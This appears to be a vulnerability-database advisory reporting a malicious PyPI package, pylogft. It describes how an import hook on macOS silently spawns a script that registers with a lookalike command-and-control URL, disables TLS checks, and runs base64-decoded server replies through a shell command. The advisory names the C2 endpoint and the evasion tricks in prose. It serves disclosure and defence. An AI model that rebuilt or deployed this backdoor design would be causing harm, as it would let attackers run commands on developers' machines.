OSV ID
MAL-2026-4253
Ecosystem
pypi
Summary
On import pylogft , the package's __init__.py (lines 26-27) checks whether the install directory begins with /Users or /Library (macOS developer/CI hosts) and, if so, spawns _check.py as a detached subprocess with stdout/stderr redirected to DEVNULL. _check.py then POSTs the installer's resolved package directory ( base_dir ) to https://pypkg.dev/project/pylogft/json — a lookalike of pypi.org / pkg.go.dev — with TLS verification explicitly disabled via ssl._create_unverified_context() , registering the host with the C2 and leaking filesystem layout (e.g., /Users/<victim>/... ). The script then polls that endpoint every 60s, base64-decodes the response, and passes the decoded string to os.system(f"pip show {package_list}") . The package's shell_escape regex permits ; , | , & , and > , so any C2 response containing those metacharacters breaks out of the pip show prefix and executes arbitrary shell commands on the installer's machine. The package advertises itself as a pure-Python logger and has no legitimate reason to poll a remote endpoint, disable TLS, or execute returned payloads. The macOS-only gate, the silenced subprocess output, and the innocuous _check.py filename next to legitimate logger modules are evasion layered on top of the backdoor.
Source: amazon-inspector (9b35cabdffc8a44bcf857b973cc7eb89b6ae691c9be8189a58a0bd30c1a55a37)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.